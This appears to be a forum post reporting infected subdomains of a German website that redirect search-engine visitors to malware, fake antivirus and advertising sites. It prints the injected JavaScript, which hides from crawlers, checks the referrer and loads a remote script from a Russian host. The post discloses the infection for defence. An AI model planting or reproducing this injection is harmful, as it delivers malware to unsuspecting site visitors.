There’s a few subdomains at ausbildung-passgenau.de that have pages that if visited from a search engine results page (so there’s a certain document referrer), will then redirect to a randomised pick of malware, fake anti-virus and advertising sites.
Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:
- fullfilescenter.ausbildung-passgenau.de
- newfiles2016.ausbildung-passgenau.de
- fastwindows2016.ausbildung-passgenau.de
This Google search results page will show any of the links in action:
https://www.google.co.uk/search?q=site:ausbildung-passgenau.deThis is the JavaScript doing the dirty work:
<script type="text/javascript">
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
|| (ref.indexOf("google.") > 0)
|| ref.indexOf("rambler.") > 0
|| ref.indexOf("bing.") > 0
|| ref.indexOf("mail.") > 0
|| ref.indexOf("yahoo.") > 0
|| ref.indexOf("msn.") > 0
|| ref.indexOf("live.") > 0
|| ref.indexOf("vk.") > 0
|| showme == 'force') {
document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
}
}
</script>
Topic: ausbildung-passgenau.de – a potpourri of badware! (Read 19753 times)